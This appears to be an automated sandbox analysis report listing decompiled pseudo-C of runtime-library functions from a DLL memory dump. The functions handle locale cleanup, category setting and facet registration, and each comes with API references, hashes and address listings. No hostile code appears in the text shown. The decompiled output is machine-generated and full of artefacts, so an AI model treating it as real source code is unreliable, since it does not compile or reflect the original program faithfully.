Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7EC
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C7FE
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C810
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C822
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C834
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C846
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C858
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C86A
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C87C
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C88E
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8A0
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8B2
Part of subcall function 6E21C7CF: _free.LIBCMT ref: 6E21C8C4

_free.LIBCMT ref: 6E21BF9D

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21BFBF
_free.LIBCMT ref: 6E21BFD4
_free.LIBCMT ref: 6E21BFDF
_free.LIBCMT ref: 6E21C001
_free.LIBCMT ref: 6E21C014
_free.LIBCMT ref: 6E21C022
_free.LIBCMT ref: 6E21C02D
_free.LIBCMT ref: 6E21C065
_free.LIBCMT ref: 6E21C06C
_free.LIBCMT ref: 6E21C089
_free.LIBCMT ref: 6E21C0A1

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction ID: e17b0c478c9c3151b25e56ba352149982991586cd884885720d8e47ced67a47b
Opcode Fuzzy Hash: abec6757cb203f6266636243d5c73318f77cccac9ef3466e4328dddb970f46af
Instruction Fuzzy Hash: 8231607550830E9FE7549AB4D842BDB73FBAF00B15F204829E159DB2A5EF71AA408B21

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E20D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e230c10) {
					E6E20CBD3(_t52);
					_t26 = _a4;
				}
				E6E20CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E20CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E20D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E20D28E(4,  &_v8);
			}

0x6e20d3f5
0x6e20d3f8
0x6e20d400
0x6e20d403
0x6e20d408
0x6e20d40b
0x6e20d40f
0x6e20d41a
0x6e20d425
0x6e20d430
0x6e20d43b
0x6e20d446
0x6e20d451
0x6e20d45c
0x6e20d46a
0x6e20d472
0x6e20d47b
0x6e20d483
0x6e20d497

APIs

_free.LIBCMT ref: 6E20D403

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E20D40F
_free.LIBCMT ref: 6E20D41A
_free.LIBCMT ref: 6E20D425
_free.LIBCMT ref: 6E20D430
_free.LIBCMT ref: 6E20D43B
_free.LIBCMT ref: 6E20D446
_free.LIBCMT ref: 6E20D451
_free.LIBCMT ref: 6E20D45C
_free.LIBCMT ref: 6E20D46A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction ID: 02c24aa89059d7b7a161fff395e392460e3a6384a0d5c1cc111f86832b4b651c
Opcode Fuzzy Hash: c29ffdec72d6794a1666693f3202838039e9982cbb23024250e878eec34f0652
Instruction Fuzzy Hash: 9611FBB954400CBFCB01DF94C841DDE3BBAEF04654B2144A0F9094F1B2EB75DE509B91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E984, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E20E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e28506c; // 0x3ec3ee36
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E20D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E20DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E20F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2091A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E202188();
									asm("int3");
									_t171 =  *0x6e2876f0; // 0xe56430
									 *0x6e285108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2851c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2851ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E20DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E216102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e230ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E1E1C3C( &_v528,  *0x6e2851e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e230de8; // 0x6e1c815c
									 *0x6e22a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2852b0;
										if(_t233 != 0x6e2852b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E20CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E20CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E20CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E20CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E20CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E1DF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

0x6e20e987
0x6e20e98f
0x6e20e996
0x6e20e999
0x6e20e99a
0x6e20e99d
0x6e20e9a1
0x6e20e9a2
0x6e20e9a5
0x6e20e9b5
0x6e20e9d8
0x6e20e9dd
0x6e20e9e2
0x6e20e9f7
0x6e20e9fa
0x6e20e9fa
0x6e20e9fd
0x6e20ea03
0x6e20ea09
0x6e20ea0c
0x6e20ea0e
0x6e20ea11
0x6e20ea18
0x6e20ea1b
0x6e20ea21
0x00000000
0x00000000
0x6e20ea23
0x6e20ea27
0x6e20ea50
0x6e20ea50
0x6e20ea29
0x6e20ea29
0x6e20ea2d
0x6e20ea31
0x6e20ea38
0x6e20ea3e
0x00000000
0x6e20ea40
0x6e20ea40
0x6e20ea43
0x6e20ea46
0x6e20ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e20ea4e
0x6e20ea3e
0x6e20ea5d
0x6e20ea5d
0x6e20ea5f
0x6e20ea65
0x6e20ea6b
0x6e20ea6e
0x6e20ea6e
0x6e20ea71
0x6e20ea74
0x6e20ea74
0x6e20ea84
0x6e20ea92
0x6e20ea97
0x6e20ea9e
0x6e20eaa0
0x00000000
0x6e20eaa6
0x6e20eaac
0x6e20eab2
0x6e20eab9
0x6e20eabf
0x6e20eac2
0x6e20eac8
0x6e20ead5
0x6e20eadc
0x6e20eae1
0x6e20eae4
0x6e20eae6
0x6e20ed3f
0x6e20ed45
0x6e20ed46
0x6e20ed47
0x6e20ed48
0x6e20ed49
0x6e20ed4a
0x6e20ed4f
0x6e20ed50
0x6e20ed5b
0x6e20ed63
0x6e20ed69
0x6e20ed6c
0x6e20ed71
0x6e20eaec
0x6e20eaec
0x6e20eafa
0x6e20eafd
0x6e20eb18
0x6e20eb1f
0x6e20eb25
0x6e20eb2b
0x6e20eaff
0x6e20eaff
0x6e20eb07
0x00000000
0x6e20eb09
0x6e20eb09
0x6e20eb0f
0x6e20eb0f
0x6e20eb07
0x6e20eb32
0x6e20eb35
0x6e20ec52
0x6e20ec55
0x6e20ec62
0x6e20ec65
0x6e20ec6d
0x6e20ec6d
0x6e20ec57
0x6e20ec5d
0x6e20ec5d
0x6e20eb3b
0x6e20eb3b
0x6e20eb41
0x6e20eb49
0x6e20eb4b
0x6e20eb4e
0x6e20eb57
0x6e20eb60
0x6e20eb66
0x6e20eb66
0x6e20eb69
0x6e20eb6b
0x00000000
0x00000000
0x6e20eb6d
0x6e20eb73
0x6e20eb74
0x6e20eb7f
0x6e20eb87
0x6e20eb8f
0x6e20eb92
0x6e20eb95
0x6e20eb9b
0x6e20eba1
0x6e20eba7
0x6e20ebad
0x6e20ebb0
0x00000000
0x00000000
0x6e20ebb2
0x6e20ebd7
0x6e20ebd7
0x6e20ebda
0x6e20ebde
0x6e20ebf7
0x6e20ebfc
0x6e20ebff
0x6e20ec01
0x6e20ec07
0x6e20ec42
0x6e20ec09
0x6e20ec09
0x6e20ec0e
0x6e20ec16
0x6e20ec17
0x6e20ec17
0x6e20ec2e
0x6e20ec35
0x6e20ec38
0x6e20ec3d
0x6e20ec3d
0x6e20ec45
0x6e20ec48
0x6e20ec48
0x6e20ec4d
0x00000000
0x6e20ec4d
0x6e20ebb4
0x6e20ebb6
0x6e20ebbb
0x6e20ebc1
0x6e20ebca
0x6e20ebd3
0x6e20ebd3
0x00000000
0x6e20ebb6
0x6e20ec70
0x6e20ec70
0x6e20ec74
0x6e20ec7c
0x6e20ec82
0x6e20ec85
0x6e20ec8b
0x6e20ec8d
0x6e20eccd
0x6e20ecd3
0x6e20ecda
0x6e20ecda
0x6e20ece0
0x6e20ece4
0x00000000
0x6e20ece6
0x6e20ece6
0x6e20ecea
0x6e20ecef
0x6e20ecf3
0x6e20ecf8
0x6e20ecff
0x6e20ed0d
0x6e20ed13
0x6e20ed16
0x6e20ed16
0x6e20ece4
0x6e20ed25
0x6e20ed2d
0x6e20ed36
0x6e20ec8f
0x6e20ec95
0x6e20ec98
0x6e20ec9f
0x6e20ecb1
0x6e20ecb8
0x6e20ecc5
0x00000000
0x6e20ecc5
0x00000000
0x6e20ec8d
0x6e20eae6
0x6e20ea61
0x00000000
0x6e20ea61
0x00000000
0x6e20ea5f
0x6e20ea58
0x6e20ea5a
0x6e20ea5a
0x00000000
0x6e20e9e4
0x6e20e9e4
0x6e20e9e6
0x6e20e9ea
0x6e20e9f6
0x6e20e9f6
0x00000000

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,07B3393E), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

_memcmp.LIBVCRUNTIME ref: 6E20EC2E
_free.LIBCMT ref: 6E20EC9F
_free.LIBCMT ref: 6E20ECB8
_free.LIBCMT ref: 6E20ECEA
_free.LIBCMT ref: 6E20ECF3
_free.LIBCMT ref: 6E20ECFF

Strings

C, xrefs: 6E20EAEC
0d, xrefs: 6E20ED50

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: 0d$C
API String ID: 1679612858-2588190061
Opcode ID: a47c2f657687df88ffbb160d110f97294227c41c564a459f44bb77b017e9bdfc
Instruction ID: 5b0b93a21a20beccc85b813fe93f79cc657e95b3aae1d33c2946f6e57672846f
Opcode Fuzzy Hash: a47c2f657687df88ffbb160d110f97294227c41c564a459f44bb77b017e9bdfc
Instruction Fuzzy Hash: 29C14975A0121A9FDB64CF58C884A9DB7B6FF49304F5045AAD94AA7394E731AE80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1C777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t50 =  *0x6e286c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1A161C(0x6e286b2c);
				_t38 = _a8;
				_t20 = E6E1A171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1C7E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1A1438(_t42);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t48);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e286c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

0x6e1c7786
0x6e1c7790
0x6e1c7795
0x6e1c77a0
0x6e1c77a4
0x6e1c77a7
0x6e1c77ac
0x6e1c77b0
0x6e1c77b5
0x6e1c77b9
0x6e1c77fe
0x6e1c7801
0x6e1c780d
0x6e1c77bb
0x6e1c77bd
0x6e1c77c3
0x6e1c77c9
0x6e1c77d1
0x6e1c77d4
0x6e1c780e
0x6e1c7811
0x6e1c781f
0x6e1c7824
0x6e1c782b
0x6e1c7830
0x6e1c77d6
0x6e1c77d6
0x6e1c77d9
0x6e1c77dd
0x6e1c77e1
0x6e1c77ee
0x6e1c77f6
0x6e1c77f8
0x00000000
0x6e1c77f8
0x6e1c77bf
0x6e1c77bf
0x00000000
0x6e1c77bf
0x6e1c77bd

APIs

__EH_prolog3.LIBCMT ref: 6E1C7786
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C7790
int.LIBCPMT ref: 6E1C77A7

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

codecvt.LIBCPMT ref: 6E1C77CA
std::_Facet_Register.LIBCPMT ref: 6E1C77E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C7801
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C781F

Strings

,k(n, xrefs: 6E1C779B

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,k(n
API String ID: 2594415655-2020936110
Opcode ID: 3186ef75f333638b03b08893d7f19d632a916ec1fa1cfa8e8539339f0b5478f9
Instruction ID: fe987b9a326b85dc330a66738f4135c667c0313f0e37f567eaa3ba5c8c05ae5f
Opcode Fuzzy Hash: 3186ef75f333638b03b08893d7f19d632a916ec1fa1cfa8e8539339f0b5478f9
Instruction Fuzzy Hash: FF11E97591061D9BCB01EBE4C844AFEB77ABF64B14F140809E510E7290DFB89D85D792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF6B3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF6B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t153;
				signed int _t154;
				void* _t166;
				void* _t179;
				void* _t192;
				void* _t205;
				void* _t218;
				void* _t231;
				void* _t244;
				void* _t257;
				void* _t270;
				signed int _t397;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				void* _t462;

				_t428 = __edx;
				_t327 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t462 - 0x14, 0);
				_t441 =  *0x6e286dc8; // 0x0
				 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
				 *(_t462 - 0x10) = _t441;
				_t153 = E6E1A161C(0x6e286d7c);
				_t330 =  *((intOrPtr*)(_t462 + 8));
				_t154 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t153);
				_t430 = _t154;
				if(_t154 != 0) {
					L5:
					E6E1C66BA(_t462 - 0x14);
					return E6E1E0075(_t430);
				} else {
					if(_t441 == 0) {
						_push( *((intOrPtr*)(_t462 + 8)));
						_push(_t462 - 0x10);
						__eflags = E6E1D1230(__ebx, _t330, __edx, _t430, _t441) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t462 - 0x20);
							E6E1E3D74(_t462 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t430, _t441, 0x14);
							E6E1C6653(_t462 - 0x14, 0);
							_t442 =  *0x6e286dc4; // 0x0
							 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
							 *(_t462 - 0x10) = _t442;
							_t166 = E6E1A161C(0x6e286d78);
							_t337 =  *((intOrPtr*)(_t462 + 8));
							_t431 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t166);
							__eflags = _t431;
							if(_t431 != 0) {
								L12:
								E6E1C66BA(_t462 - 0x14);
								return E6E1E0075(_t431);
							} else {
								__eflags = _t442;
								if(_t442 == 0) {
									_push( *((intOrPtr*)(_t462 + 8)));
									_push(_t462 - 0x10);
									__eflags = E6E1D12B4(_t327, _t337, __edx, _t431, _t442) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t462 - 0x20);
										E6E1E3D74(_t462 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t327, _t431, _t442, 0x14);
										E6E1C6653(_t462 - 0x14, 0);
										_t443 =  *0x6e286dd8; // 0x0
										 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
										 *(_t462 - 0x10) = _t443;
										_t179 = E6E1A161C(0x6e286d84);
										_t344 =  *((intOrPtr*)(_t462 + 8));
										_t432 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t179);
										__eflags = _t432;
										if(_t432 != 0) {
											L19:
											E6E1C66BA(_t462 - 0x14);
											return E6E1E0075(_t432);
										} else {
											__eflags = _t443;
											if(_t443 == 0) {
												_push( *((intOrPtr*)(_t462 + 8)));
												_push(_t462 - 0x10);
												__eflags = E6E1D1339(_t327, _t344, __edx, _t432, _t443) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t462 - 0x20);
													E6E1E3D74(_t462 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t327, _t432, _t443, 0x14);
													E6E1C6653(_t462 - 0x14, 0);
													_t444 =  *0x6e286db0; // 0x0
													 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
													 *(_t462 - 0x10) = _t444;
													_t192 = E6E1A161C(0x6e286d64);
													_t351 =  *((intOrPtr*)(_t462 + 8));
													_t433 = E6E1A171B( *((intOrPtr*)(_t462 + 8)), _t192);
													__eflags = _t433;
													if(_t433 != 0) {
														L26:
														E6E1C66BA(_t462 - 0x14);
														return E6E1E0075(_t433);
													} else {
														__eflags = _t444;
														if(_t444 == 0) {
															_push( *((intOrPtr*)(_t462 + 8)));
															_push(_t462 - 0x10);
															__eflags = E6E1D13A1(_t327, _t351, _t428, _t433, _t444) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t462 - 0x20);
